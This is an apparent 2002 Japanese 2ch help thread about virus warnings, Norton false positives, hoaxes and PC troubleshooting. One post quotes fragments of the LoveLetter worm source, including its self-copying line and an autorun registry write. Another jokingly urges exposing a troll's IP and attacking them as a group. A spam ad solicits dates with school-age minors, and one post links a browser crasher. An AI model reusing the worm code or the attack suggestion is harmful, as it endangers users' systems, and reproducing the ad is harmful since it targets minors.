c:\WINDOWS\Temporary Internet Files\Content.IE5\89UJ856N\subback[9].html は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\W1AZ49AF\news[4] は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\RYZXYNIY\subback[7].html は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\KPWJS96T\sec[2] は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[12] は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[13] は 次のウィルスに感染しています: VBS.LoveLetter.Var
こうなってます。
疲れました・・・

216 :  :02/08/12 22:48
http://ime.nu/www.kogalu.com/sou/girls/index2.htm
これウイルスですか?
うかつにも踏んでしまいました。
ちなみにウイルスバスターには入ってます。

217 :名無しさん@お腹いっぱい。:02/08/12 22:52
>>215
過去レス読んだ?このVBS.Love Letter...は無害だから。
それに、削除したファイルはごみ箱に行くことは知ってるよね?
C:\Recycledってのはごみ箱のことです。中身空にすりゃいい。
あと、削除作業してからまた2ちゃん見たでしょう。それでキャッシュファイルが
再度できちゃってるね。とにかく過去レスに該当ウィルス(?)のスレが載ってるから
見てみなよ!

218 :コギャルとHな出会い:02/08/12 22:54
http://kado7.ug.to/net/


朝までから騒ぎ!!
   小中高生
 コギャル〜熟女まで
   メル友
  i/j/PC/対応

女性の子もたくさん来てね
  小中高生大歓迎です                 
全国デ−トスポット情報も有ります。
全国エステ&ネイル情報あります。

  激安携帯情報あります。

219 :名無しさん@お腹いっぱい。:02/08/12 22:56
女性の子…文がおかしいな(w
コピペに突っ込みなのでsage

220 :名無しさん@お腹いっぱい。:02/08/12 22:59
>>219
額面上だけ丁寧にして引き寄せようという罠。
あまりに見え透いている。

221 :名無しさん@お腹いっぱい。:02/08/12 23:13
>217
失礼しました。
「オフライン・・・」にチェック入れずに削除
してました。
今、スキャンしたら感染0でした。
ふうう・・・

222 :ちびた:02/08/12 23:17
教えていただきたいのですが、
ウイルスにやられたみたいなんです。

症状は、IEのブラウザや、普通のフォルダを見ているときの、右端に、
「スクロール」するやつがありますよね。
マウスで左クリックして、押したままにして、上下に動かすやつです。

そのスクロールするやつが、なにもマウス操作もしていないのに、
勝手気ままに上下動を繰り返すのです。
そんなもんだから、IEブラウザも、じっくり見ていられません。

どう対処すればよろしいのでしょうか?


223 : :02/08/12 23:23
>>222
駆除しろよ

224 :ちびた:02/08/12 23:28
>>223
削除方法、教えていただけませんでしょうか?

あと、なんのウイスルかもわからないもんで・・

225 :名無しさん@お腹いっぱい。:02/08/12 23:32
最大化、最小化、閉じるなどのアイコンが
数字などになったんですがこれってウィルスですか?

226 : :02/08/12 23:33
>>224
ネタはよそで
独り言は部屋で

227 :名無しさん@お腹いっぱい。:02/08/12 23:40
>>225
セーフモードで起動せえ
直る

228 : :02/08/12 23:40
608 名前:ちびた 投稿日:02/08/12 23:16
教えていただきたいのですが、
ウイルスにやられたみたいなんです。

症状は、IEのブラウザや、普通のフォルダを見ているときの、右端に、
「スクロール」するやつがありますよね。
マウスで左クリックして、押したままにして、上下に動かすやつです。

そのスクロールするやつが、なにもマウス操作もしていないのに、
勝手気ままに上下動を繰り返すのです。
そんなもんだから、IEブラウザも、じっくり見ていられません。

どう対処すればよろしいのでしょうか?


609 名前:ちびた 投稿日:02/08/12 23:20
すみません、上の書き込み、書くスレ間違えました。
無視してやってください。

よろしければ、こちらへ・・・
http://pc.2ch.net/test/read.cgi/sec/1027397623/


ネタ決定

229 :名無しさん@お腹いっぱい。:02/08/12 23:42
そんなの貼りつけてどうすんの?

230 :名無しさん@お腹いっぱい。:02/08/12 23:49
>>227
ありがとうございますた。
危うく初期化するところでした、マジで。

231 :名無しさん@お腹いっぱい。:02/08/12 23:51
>>230
そんな君に
ttp://winfaq.jp/
全部読んだら勉強になるぞ。

232 :名無しさん@お腹いっぱい。:02/08/12 23:53
>>224
笛かよ。w
そんなウィルス聞いたこと無いよ。接続はダイアルアップ?
オンラインウィルスチェックってのもあるけど試す?
このスレの>>1-2を見る。

233 :名無しさん@お腹いっぱい。:02/08/12 23:57
>>224
その現象が起きたきっかけは?
いちおうOSとIEのバージョンと入れているウイルス対策ソフトの名前も聞いておこうか。

234 :名無しさん@お腹いっぱい。:02/08/13 00:01
予想
Windows 95
IE 4 SP2
ウイルスバスター97

235 :名無しさん@お腹いっぱい。:02/08/13 00:04
>>234
ちょっとワラタ

236 :199:02/08/13 00:46
ノートンのログを調べてたら判明した事項がありました。
何らかの要因で
http://strange.kurumi.ne.jp/bbs.cgi?n2
を踏んだらしく、そこを踏むと(ノートンのWebアクセス履歴からは)
http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
(%の数は適当です)
にアクセス、
http://localhost/?n2
にアクセスしたあと、http://www.army.mil/へとアクセスしていたみたいです。
そのあとの現象は199で書いたまま。
もしも何か知ってる方がおられましたら教えていただければ幸いです、


237 : :02/08/13 01:26
>>197
それ来たよ。あと Windows XP Patch なんていうのもあった。

238 :ちびた:02/08/13 02:07
>>227
セーフモードではなおりませんでした。

>>232
ADSLです。
オンラインウィルスチェックなんてあったんですね。
ありがとうございます。現在、それをやっているところです。
でも、まだおわらないとこみると、結構時間かかるんですね。
情報、感謝です。

>>233
きっかけは、わからないんです。
ウイルスメールは、2週間に1回ほどきますけど、
開かずに、ちゃんと削除してるので問題ないと思いますし。
OSはwindows98、IEは5.50.4807.2300です。

みなさま、ありがとうございます。
なおらなかったら、またお聞きしていいですか?

239 :ちびた:02/08/13 02:25
オンラインウィルスチェックの結果は、ウイルス無しです。
ということは、いったい、どういうことなのやら・・

勝手にスクロールするこの症状、超むかつきます。
ここに書き込むのさえ、一苦労。
どうすれば、なおるのでしょう?(泣)

240 :名無しさん@お腹いっぱい。:02/08/13 02:30
>>239
IEを再インスコすれば?


241 :ちびた:02/08/13 02:32
>>240
なるほど。
やりかたがわからないけど、
トライしてみます。

マイクロソフトのホームページいって、
ダウンロードする方法でOKなのかな。どれどれ・・

242 :名無しさん@お腹いっぱい。:02/08/13 02:42
>>241
>ダウンロードする方法でOKなのかな。
ダウンロード??

まぁ、いいや。
徐々に謎が解けるから、がんばれよ。


243 :ちびた:02/08/13 02:51
IE6にしたけど、
解決せず。

どーーなってんのーー

>>242
だめでした。

244 :名無しさん@お腹いっぱい。:02/08/13 03:08
とりあえずブラウザをOperaあたりに変えてみる

ttp://www.jp.opera.com/download/

245 :名無しさん@お腹いっぱい。:02/08/13 03:16
再インスコ

246 :名無しさん@お腹いっぱい。:02/08/13 03:53
なんで寄ってたかって真正面でとらえるの?
オレはマウスの故障に一票だ!
つーかそれって定番ネタだと思う

247 :名無しさん@お腹いっぱい。:02/08/13 06:23
>>246
んじゃ俺はキーボードが原因に500ウォン

248 :nao:02/08/13 09:00
『KELDCIKE.EXE.htm(642□□□)』という添付ファイル付きのメールが
送信者・件名がブランクで届きました。
これってウイルスでしょうか…?
symantecや検索サイトで検索してもヒットしませんでした。

249 :名無しさん@お腹いっぱい。:02/08/13 09:52
Macromedia Flash Playerのセキュリティー上の欠陥ってなに?

250 : :02/08/13 10:40
>>248
ウイルスだろうな

251 :名無しさん@お腹いっぱい。:02/08/13 10:54
今日、閉じるや最大、最小のボタンが数字になってたので、加入してるサポートセンターに
電話で尋ねて、解決法を教えてもらい試したが直らなかった。そしたらそこの男は
修理に出すしかないと言った。どうしても納得いかなかったので解決法はないかと2chへ
来てこのスレ見たら、既出の質問で、http://.winfaq.jp/へ行ったら解決できました。
糞野郎のせいで危うく修理にだすとこだった。それと携帯から電話したので140円もかかった。
改めて2chの凄さを知った。最初からここに来ていれば・・・

252 :名無しさん@お腹いっぱい。:02/08/13 11:13
>>251 ブラウザのセキュリティレベルを見直さないとまた食らうぞ。
何のサポートか知らんが、自分で食らった不正プログラムの始末まで
面倒見るサポートはないと思うぞ。なんでも人のせいにするなよ。

253 :名無しさん@お腹いっぱい。:02/08/13 11:15
>>251
はじめから自分で調べようとはしないのね

254 :名無しさん@お腹いっぱい。:02/08/13 11:17
>>252
フォントキャッシュが壊れていただけで
不正プログラムは関係ないと思われ

255 :名無しさん@お腹いっぱい。:02/08/13 11:16
つーかセキュリティとかんけーない

256 :名無しさん@お腹いっぱい。:02/08/13 11:19
>>251
サポートセンターに
「その程度のことで電話してくるような輩は埒があかないので修理」
って思われたんだよ

257 :名無しさん@お腹いっぱい。:02/08/13 11:20
>>254-255 なんで時間が逆転してんの?

258 :名無しさん@お腹いっぱい。:02/08/13 11:24
ネット関係→セキュリティー→ スレッド一覧にいったら
VBS.LoveLetter.Var ウィルスに感染しました 私は除去しましたが
気をつけてください。また 誰か詳しい方 調べてください。

259 :名無しさん@お腹いっぱい。:02/08/13 11:26
>>258 いまごろ何を・・・
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

260 :名無しさん@お腹いっぱい。:02/08/13 11:30
>>259さん ありがとうございます。 

261 :名無しさん@お腹いっぱい。:02/08/13 11:41
共有を使って自己複製するタイプのワームで、LAN内で感染しているPCを
一発で特定するいいツールって無いですかね?

例えばLANを経由して共有フォルダのファイルを操作したログを自動的に
取る様なソフトとか・・・



262 :名無しさん@お腹いっぱい。:02/08/13 13:20
>>222(ちびた)
やっぱり他の人が言うようにマウスかなにかの不具合かも知れないよ?
まあよくわからんけど、俺だったらコントロールパネルのマウスのプロパティで
設定を変えてみて様子を見る。自分のPCではタッチパッドなので、エッジモーション機能が
(パッドのはしっこをいじるとスクロールする)なにか関係したりしないかなあ、とか。
どうしても直らないならマウスのドライバをインストールし直すかな。
入力関係が正常なのにその現象が常時起きるなら背後で動くアプリが有るはず。
msconfigからスタートアップタブを見る、またはレジストリで該当箇所を確認。
でも人のPCだからホントにわからないねえ。マウスの設定で、スクロールできる方法を
全部OFFにしてみたら?惰性を使用するってのもあったね。


263 :名無しさん@お腹いっぱい。:02/08/13 14:58
>>222
使ってるマシンは、ノート?
タッチパッドだとすると……………

264 :時間が逆転!!!!!:02/08/13 18:37
>>254-255
ほんまや!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

265 :名無しさん@お腹いっぱい。:02/08/13 19:16
macro virusをノートンが検出しましたがどうしたらよいのでしょうか?
2ちゃんねるをリロードすると検出されましたが。

266 :名無しさん@お腹いっぱい。:02/08/13 19:22
すいません。どうもこれに騙されていたようです。

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

267 :名無しさん@お腹いっぱい。:02/08/13 19:36
>>265-266 >>259

268 :名無しさん@お腹いっぱい。:02/08/13 19:41
ニュー即+で張り幕ってル奴がいるのですがどうしたらよいでしょうか?

269 :名無しさん@お腹いっぱい。:02/08/13 19:59
>>268
ソーシャルかけておいこんでIPアドレスさらしたらみんなで
おもいおもいにこうげきする。
チームワークがぢゅうようだよ。
ハニーポットたてるのもいいかもね。


270 :名無しさん@お腹いっぱい。:02/08/13 20:30
HDDからCIHを検出。アブネーアブネー。


271 :cheshire-cat ◆CATJR.v6 :02/08/13 20:41
>>270
おやぁ?今時って感じなんだけど。誤検出じゃなくて本当に?

272 :ちびた:02/08/14 02:06
レスありがとうございます。

もうだめだ(死
くそ、まじむかつく。
まだ直らず。
もうパソできん。

273 :ちびた:02/08/14 02:06
>>263
いえ、デスクトップです

274 :ちびた:02/08/14 02:09
>>262
いろいろありがとうございます。
コントロールパネルのマウスのプロパティをいじろうとしたんですけど、
このときも、症状がでてしまい、勝手に設定が変えられてしまうんです。
もうどうしようもない。
つまり、いかなる状況においても、マウスの中央のボタンみたいなのが
勝手に転がってしまっているっていう状態なんです。

275 :ちびた:02/08/14 02:12
やっとのことで設定を変えても(中央ボタンを無効にした)、
症状があらわれるのです。

msconfigとか、レジストリとかは、初心者なので、さぱーりわかりません。
惰性とは何でしょうか?

276 :名無しさん@お腹いっぱい。:02/08/14 02:18
マウス引っこ抜いてみれば
tabキーと矢印キーでも操作できるっしょ

277 :名無しさん@お腹いっぱい。:02/08/14 03:58
>>275
だからマウス換えてみろって500円のとかでいいからさ
じゃなきゃとりあえず>>276の言うようにマウスレスにしてみる!

278 :名無しピンチ:02/08/14 04:03
PC起動して、動作が変だと思いHDD見たらローカルディスク:C
の容量が少しずつ減っていき(2〜4Mずつくらい)、空き容量が1G→200Mになりました。
ディスククリーンアップをすると元の容量になるのですが、また
減っていきます。これはウイルスでしょうか?
即レスお願いします(o_ _)o

279 :名無しさん@お腹いっぱい。:02/08/14 04:21
>>278
OSくらいは書くべきでは?
怪しい物が動いているか調べたいならタスクマネージャで
挙がるものをリストしてみれば良い

こんなとこで即レスなんとかってやめとけよ
失礼なだけだ

280 :名無しピンチ:02/08/14 04:26
>>279
OSはWindowsMeです、忘れてました。
タスクマネージャはどこにあるのでしょうか?


281 :名無しピンチ:02/08/14 04:32
↑特に怪しいものは動作していないようです。

282 :名無しさん@お腹いっぱい。:02/08/14 04:58
Meは裏でなに動いてるか解らんから
プロセス監視ツールかなんかでもっかいチェックしれ

283 :名無しさん@お腹いっぱい。:02/08/14 05:02
ttp://homepage1.nifty.com/wakuhome/java/soft/tools.htm

何かが動作していない限り容量が変わることはないと思うのは俺だけか?

284 :名無しさん@お腹いっぱい。:02/08/14 05:11
>名無しピンチ
IEのキャシュは何MBに設定している?

285 :名無しピンチ:02/08/14 05:20
>>282,>>283 さん
ありがとう〜。ソフト使ってみたけどよく分かりませんでした(ぉ
>>284 さん
IEのキャッシュ・・・ですか?そこらへんはいじったことないので
よくわかりません><
IEのキャッシュはどうやればわかりますか?

286 :名無しさん@お腹いっぱい。:02/08/14 05:42
>>285
http://homepage2.nifty.com/winfaq/wme/trouble.html#26読め

287 :名無しピンチ→多分解決:02/08/14 05:58
>>286 さん
↑のサイト逝ってきました。
ローカルディスクの容量が増え、とりあえず解決したようです
どうもありがとうございました〜m(_ _"m)


288 :ちびた:02/08/14 06:12
こんどは、OSの文字化け。
最悪

289 :名無しさん@お腹いっぱい。:02/08/14 06:20
>>288
おめでとう。

つーか、サポートに聞けよ。
すでに板違いだしな。


290 :名無しさん@お腹いっぱい。:02/08/14 06:46
>>ちびた
どうせフォントキャッシュのアレだろ?
winFAQとか検索しなよ

291 :民主党、コンピューターウイルス防止法案提出へ:02/08/14 13:44
「民主党はインターネットを経由してパソコンソフトを破壊するなどの被害
を与えるコンピューターウイルスを取り締まるための「コンピューターウ
イルス防止法案」(仮称)を秋の臨時国会に提出する。多様化しているウ
イルス被害に対応するため、被害発生の有無や内容にかかわらず、ウイル
スを作ったり、配布、送信するだけで処罰の対象とするのが柱だ。」

http://www.nikkei.co.jp/news/seiji/20020814AT1EI007013082002.html

292 :民主党、コンピューターウイルス防止法案提出へ:02/08/14 13:49
こちらのほうが少し記事が長い。
http://it.nikkei.co.jp/it/top/index.cfm?i=2002081307714j0

293 :名無しさん@お腹いっぱい。:02/08/14 14:17
今日ノートンを買ってきて、いれました。
ウィルススキャンしたところ、「Macro.src]というウィルスが
検出されました。
修復できないらしいんで、検疫のところにいれてあるんですが、
削除するべきですか?
ほんと何もわからなくて・・・お願いします。


294 :名無しさん@お腹いっぱい。:02/08/14 14:32
>>293


181 名前: ひよこ名無しさん 投稿日: 01/12/08 14:42 ID:Wz7+XgCU

WinMeでIE6とメーラーは、Outlookを使っています。
プレインストールされていたMacfeeとトレンドマイクロのオンラインウイルススキャン
では、何もでませんでしたが、シマンテックのオンラインスキャンで、一つのファイル
が感染していると云われました。
C:/WINDOWS/TemporaryInternetFiles/Content.IE5/A9T9C750/sec[2]
Macro.src
 それで、Macro.srcというののことをシマンテックのサイトで調べましたら、
特に詳しいことは書いていなかったのですが性質がワイルドと書いてありました。
 皆様にお聞きしたいのは、この、『性質がワイルド』というのはどういうことか
ということと、このファイルを削除してしまっても、システムに問題など起こらないか
ということです。
 あと、もう一つ、ノートンは、PCとの相性があると聞いたことがあるのですが、
本当ですか?(私のPCはバイオのノート型なのですが大丈夫でしょうか)


183 名前: ひよこ名無しさん 投稿日: 01/12/08 14:44 ID:???

<181
C:/WINDOWS/TemporaryInternetFiles/にあるファイルは削除しても問題ない。

295 :293:02/08/14 15:23
>294
ありがとうございました!!
同じケースでした。
既出なのにわざわざすみませんでした。

296 :ちびた:02/08/14 17:24
>>290
「フォントキャッシュのアレ」とは、なんのことでしょうか?
すんません、教えてくださいませ!

オンラインウイルスチェックでは、感染してないと出ました。

297 :名無しさん@お腹いっぱい。:02/08/14 17:31
>296
もういい加減セキュリティとは関係ない。

ここまで。

298 :名無しさん@お腹いっぱい。:02/08/14 17:39
>>296
ここの2を。
☆★質問の前にこのFAQ集を見てね★☆7/13
ttp://pc.2ch.net/test/read.cgi/pcqa/1026520939/

あとはここで。
パソコン初心者板総合質問スレッドVol.117
ttp://pc.2ch.net/test/read.cgi/pcqa/1029308096/



299 :将軍(カリンカ命):02/08/14 17:51
>DSL導入時のウイルスバスター2001への対策 http://www.trendmicro.co.jp/product/vb2001/adsl.htm
一部機能をレジストリキー削除でスタートアップから外すんですが、
その後の再起動から、Explorerがログイン後バスターのスタートアップ時にに落ちることがある。

数回あとの再起動時、プロンプトからGUIに切り替わってすぐにブルーバック
メモリのどっかがトラブって、ダンプしていますという表示のままフリーズ

そのあとから、ログイン画面でctrl alt del押下時に、入力画面の前に
タイトルバー”・”メッセージ”・”OKボタンのみのポップが出るようになった。

再診パターンファイルのVB2001で検索してウイルスなし。
これは単にレジストリぶっ壊れですか?

300 :ms-sql-s をブロックしました:02/08/14 18:18
66.115.46.194,ms-sql-s をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 10.224.72.159,ms-sql-s
リモートアドレス、 サービスは 211.178.91.133,4710
プロセス名は N/A

301 :名無しさん@お腹いっぱい。:02/08/14 18:24
昨日今日と添付ファイル付メールがきました。
タイトルは英文、中身も英文、ファイル名は「no_failname」と怪しさ全開です。
でも、ノートンは全く反応しません。
もちろんウィルス定義は最新です。
新しいウィルスなのでしょうか・・・?

302 :名無しさん@お腹いっぱい。:02/08/14 18:44
>>301
人柱という言葉を知っているかね


303 :名無しさん@お腹いっぱい。:02/08/14 18:48
>>301 それだけの情報ではわからない。
個人的にはKlezの壊れたヤシのような気がするが。人柱になるのが嫌なら捨てる。

304 :名無しさん@お腹いっぱい。:02/08/14 19:19
>>301
SARCにでも提出しろ。
「その方法は?」はあらかじめ却下。マニュアル読め。

305 : :02/08/14 19:23
ファイヤーウォールでZONEARAMEと言う奴を使っていたのですが
使い勝手が悪いので初心者でも簡単に使えるファイアーウォールを教えてください

306 :初心者:02/08/14 19:27
見覚えがあるような、ないような(ハッキリ覚えていないのです・・・)人から
メールが来ました。
なんでも、jdbgmgr.exeという、ノートン先生などでは
みつけられないウィスルだから削除しろと書いてありました。
さっそく検索してみたらそのファイルがみつかりました。
ウィルスバスターはこのファイルにウィスルは検出されなかったと言っています。

「14日間静かにしていて14日後 にシステムを破壊する」とメールに
書いてあるのですが、Cドライブに見つかったこのファイルの作成日は5月で、
とっくに14日経っているのですが・・・?
今のところどこを破壊されたのかよくわからないので、不安です・・・。

どうしたらいいのでしょうか・・・。

307 :初心者:02/08/14 19:30
>306です。
メールを送ってきた相手は、以前オークションで取引きをした相手でした。

308 :名無しさん@お腹いっぱい。:02/08/14 19:31
>>306
http://www.google.com/search?q=jdbgmgr.exe&hl=ja&lr=lang_ja
検索しろ

309 :名無しさん@お腹いっぱい。:02/08/14 19:31
>>306 それ、3ヶ月も前に流行ったデマ。
http://www.ipa.go.jp/security/topics/alert140515.html
検索ぐらいしろよな。

310 :名無しさん@お腹いっぱい。:02/08/14 19:33
>>305

XPでも買えば。デフォルトで入ってるぞ。
つーか、使いにくいなら使うな。

311 :名無しさん@お腹いっぱい。:02/08/14 19:34
>>309
ケコーンする?

312 :309:02/08/14 19:35
ウフッ

313 :初心者:02/08/14 19:37
>306-307
レスありがとうございました。
デマですか。
どうもおかしいなとは思っていたのです。

ケコーンおめでとうございます。

314 :ちびた:02/08/14 19:49
>>298さま
ありがとうございます。あなたは神です。
セーフモードにしたら、文字化けはなおりました。

しかし、スクロールのほうは、いまだなおっておりませんが(死

315 :名無しさん@お腹いっぱい。:02/08/14 19:51
以降>>314は放置で。

316 :301:02/08/14 20:25
>>302-304
レスありがとうございます。
「添付ファイル開いてみたい!」と思います。でもやはり止めときます。
即ゴミ箱に捨てていますが、ノートンが反応しないのが不思議で。
今度来たら捨てずにSARCに提出してみます。

ありがとうございました!

317 :名無しさん@お腹いっぱい。:02/08/14 20:39
>>316
FinalDataか何か持ってないの?
もったいない。passwor+zip圧縮で保存しなさい。


318 :名無しさん@お腹いっぱい。:02/08/14 21:04
>>317
passwor< これ凄いよね!!

1024bitのEnCrypterでしょ?
PGPなんて目ぢゃないね。
・・んで、どこで落とせるの??


319 :GPX ◆Ninja4PY :02/08/14 23:49
質問させてください

多分ですがトロイを仕組まれたようです。環境は
Win2K(SP3)
ノートン2001(パターン最新)
BlackICE(最新)
DSL常時接続
にて使用しています。
昨日BlackICEで突然15件ほど一気にアタックを受けた後に
Administrator権限でもアプリ(全て)の起動ができなくなり、
System32フォルダへのアクセスができなくなりました。

とりあえず自分でサイトを回って調べたのですが、どれにやられたのかがわからずに困っています
できるだけ仕事などのファイルはサルベージしたいのですが、どうすれば良いでしょうか?

320 :名無しさん@お腹いっぱい。:02/08/14 23:57
>>319
Runas使って何とかならんの?

321 :名無しさん@お腹いっぱい。:02/08/15 00:06
>>319
パターンファイルの日付は?
Norton Internet Security だけっていう落ちはないよね。

最悪、別のPCにつなげてサルベージ。

322 :GPX ◆Ninja4PY :02/08/15 00:11
>>319-320さん

レスありがとうございます。
Runasですが、実行を拒否されますた(T-T)
パターンファイルは多分最新です(11日に更新しています)
スペアマシンにつないでサルベージですかね...やっぱ

土日に頑張って200G助けてみますです(号泣)

323 :名無しさん@お腹いっぱい。:02/08/15 00:15
>>322
これでも試してみては?
http://www.moosoft.com/thecleaner/

regeditもダメ?

324 :名無しさん:02/08/15 00:16
ここのスレをかちゅで見ようとしたらノートンがウイルスがいると警告を出したけど
なんで?

ttp://game.2ch.net/test/read.cgi/ff/1029256768/

325 :名無しさん@お腹いっぱい。:02/08/15 00:22
>>324
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50
何回目だろう・・・

326 :GPX ◆Ninja4PY :02/08/15 00:23
>>323さん

これは知りませんでした。
regeditはタスクマネージャーからのみ呼び出しができますが、
レジストリ周りは私がそんなに詳しくないのでどうにも...
ただ自動実行のあたりのキーは変なものはなかったです。
起動するたびにどんどん動作が怪しくなってますので、いじらない方が無難かも

サルベージの時に紹介していただいたソフトも使ってやってみます

327 :名無しさん@お腹いっぱい。:02/08/15 00:27
>>326
一応、使ったことはないので保証はできないけどね。
どこかのPC系ニュースサイトで見た記憶があるから、それなりに使えるかもしれない、というだけ。
マターリがんばれ。

328 :名無しさん@お腹いっぱい。:02/08/15 00:42
windows2000ユーザなのですがwinntの中に”藁”とか”・”とかっていう
ファイルがありました。
これって何かのウイルスに感染してるのでしょうか?
不安でしょうがないです。。。

329 :名無しさん@お腹いっぱい。:02/08/15 00:53
>>328
まず、ウイルス対策ソフト名は?
定義ファイルはいつのだ?
スキャンした結果は?
拡張子はないのか?

ネタ決定まであと2レス。

330 :328:02/08/15 00:57
mcafeeのヴィールススキャンです。
定義ファイルは最新ものです。
スキャン結果は異常なし
拡張子はなしです。
ほかに”・”ってファイルもありました・・・。

331 :名無しさん@お腹いっぱい。:02/08/15 01:03
>>330
ファイルのタイムスタンプに思い当たることは?
最近何か普段と違うこと(インストールとか添付ファイルを開いたなど)をした記憶は?

何もなければ削除してもかまわんと思う。
暇ならSARCにでも提出してみたら?
バイナリエディタで開いてみるとか。

332 :名無しさん@お腹いっぱい。:02/08/15 09:07
あのfree.Links B に感染してしまったのですが,
感染されていると思われるC:/WINDOWS/TemporaryInternetFiles/Content.IE5
にあるファイルを手動で削除しましたが,
その後スキャンしても検出しなかったのですが,
これで大丈夫だったのでしょうか?ちなみにウィルスソフトは,
Norton AntiVirus 2002,メールソフトはNetscape6.21です。
OSはXP,IE6 宜しくお願いします。

333 :名無しさん@お腹いっぱい。:02/08/15 09:47
>>332 スキャンして検出しなかったのならOK。
NAVの最新ファイルは、
http://www.symantec.com/region/jp/sarcj/defs.download.htmlで。
現在Liveupdateが壊れているみたいなので。

334 :初心者:02/08/15 11:12
昨日ノ-トソがVBS.LoveLetter.Verに感染しています。
の警告が出て、削除しようとしたらファイルへのアクセスが拒否されますた。
それでコンピュ−タをウィルススキャンしてみましたら
緊急注意からシステムOKになっていました。
いったい何なんでしょうか?
詳しい方どうかレスお願いいたします。

335 :名無しさん@お腹いっぱい。:02/08/15 11:16
>>334 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

336 :初心者:02/08/15 11:23
>>335さん
ありがとうございました。
そうゆう事でしたか。
すごくストレスになっていたのでホットしました。
初心者ですいませんでした。

337 :名無しさん@お腹いっぱい。:02/08/15 18:57
age

338 :名無しさん@お腹いっぱい。:02/08/15 19:46
なんか画面にピースマークの偽者見たいなのが
いっぱい暴れ回ってたんですけどウィルスですか?
パソコン買ったばかりなので、誰か教えて下さい。

339 :名無しさん@お腹いっぱい。:02/08/15 19:51
>>338
たぶんね。
ご愁傷様。

340 :338:02/08/15 19:54
>>339
ウィルス駆除ソフトとかで何とかなるんですか?
何度もすみません。何かが消えたとかはないんですが。

341 :名無しさん@お腹いっぱい。:02/08/15 20:02
>>340
はい。キミの使うPCのOSと接続回線の種類、入れている対ウィルスソフトの名前などを
書いてください。ピースマークの偽者はPCを起動してから終了するまでずっと画面にいるの?

342 :名無しさん@お腹いっぱい。:02/08/15 20:07
すいません、OSとか言われてもよくわかりません。
偽者はいないん電源が切れていなくなったんですけど
すぐパソコンが止まって強制終了とかもできなくなったりします。
素人すぎてすいません。

343 :名無しさん@お腹いっぱい。:02/08/15 20:10
>>342
買ったばかりでかぃ。たまらないね。
OSというのはたとえばWindows XPとかMeとか98とか、そういうの。
接続は常時接続じゃないね?ADSLとか。

344 :名無しさん@お腹いっぱい。:02/08/15 20:12
>>342
大変だね。
とりあえずつながってる回線引っこ抜いて、有料PCサポートに電話してごらん。
3万円もあれば再インストールからアプリの導入までやってくれるよ。

345 :名無しさん@お腹いっぱい。:02/08/15 20:14
xpです。ADSLと思います。ウィルスソフトはないので買いに
行こうと思ってます。どれがいいとかがわからないので。


346 :名無しさん@お腹いっぱい。:02/08/15 20:14
>>342
買ってからどんなソフトを入れたの?ゲームとか?
いちどスキャンディスクをしてみて。スタートからプログラム、アクセサリ、
システムツールとたどっていけばみつかるから。チェック方法は「標準」でやればいいよ。
(「完全」でなくて)

347 :名無しさん@お腹いっぱい。:02/08/15 20:19
みなさんやさしいですね。ありがとうございます。
>>344
電話してみます。
>>346
システムツールの次何をしていいかわかりません。
すいません。

348 :名無しさん@お腹いっぱい。:02/08/15 20:23
>>347
システムツールの次にいろいろ名前が出る中に、スキャンディスクってのがあるよ。

349 :名無しさん@お腹いっぱい。:02/08/15 20:27
>>347
ありがとうございます。がんばってなんとかしてみます。
私の中では347さんが神ですよ!

350 :名無しさん@お腹いっぱい。:02/08/15 20:27
画像閲覧ソフトを
http://homepage1.nifty.com/k_okada/
ここからダウソしたのですがexeファイルがあって不安です。
大丈夫でしょうか?



351 :名無しさん@お腹いっぱい。:02/08/15 20:35
んー
ピースマークの偽者って言うと
ttp://www.raus.de/crashme
このブラクラを思い出すんだが、単なるブラクラじゃないの?


352 :名無しさん@お腹いっぱい。:02/08/15 20:39
>>349
一応聞いておくけど。
再起動はしてみた?
んで、ミ田(ウインドウズキー)+R
もしくはスタートメニューの「ファイル名を指定して実行」で
msconfig
でスタートアップを全部無効にしてみるとか。
まだウイルスと決まったわけじゃないし。

353 :名無しさん@お腹いっぱい。:02/08/15 20:39
>>350
ま、普通ソフトならexeファイルはあるわな

そんなに不安ならフリーのでもいいからウィルス対策ソフトぐらい入れろ
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50


個人的にはソフトウェア板でVixは危険ですか?って聞いて
思いっきり罵倒されて来い、と思う

354 :名無しさん@お腹いっぱい。:02/08/15 20:43
>>347 (これはキミだ)
で、ADSLなら話は速い。
ttp://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
このページの上にあるダウンロードをクリックし、次のページの使用許諾条項に「同意する」を
クリック、簡易版のアンチドートをDLして。使い方は最初のページにリンクがあるから
そこから読んでみる。それでうまく使えたら、PCが今ウィルスに感染しているかどうか
わかるから(ファイル等全部OKなら感染していない)、もしウィルスの名前が出たら
それをカキコしてくれればいいよ。
あ、今351を見たけども、今回大したことがなくてもこのアンチドートはいざというときに
使えるから、お気に入りにでも入れて覚えておいて。(使うたびに最新のをDLすること)
あと、金があれば何か常駐するウィルス対策ソフト買って入れてください。ただのでも
いいけどね。このスレの>>2を参考に。

355 :名無しさん@お腹いっぱい。:02/08/15 20:45
殺伐としたスレが多い中、久しぶりにマターリしたよ。(W
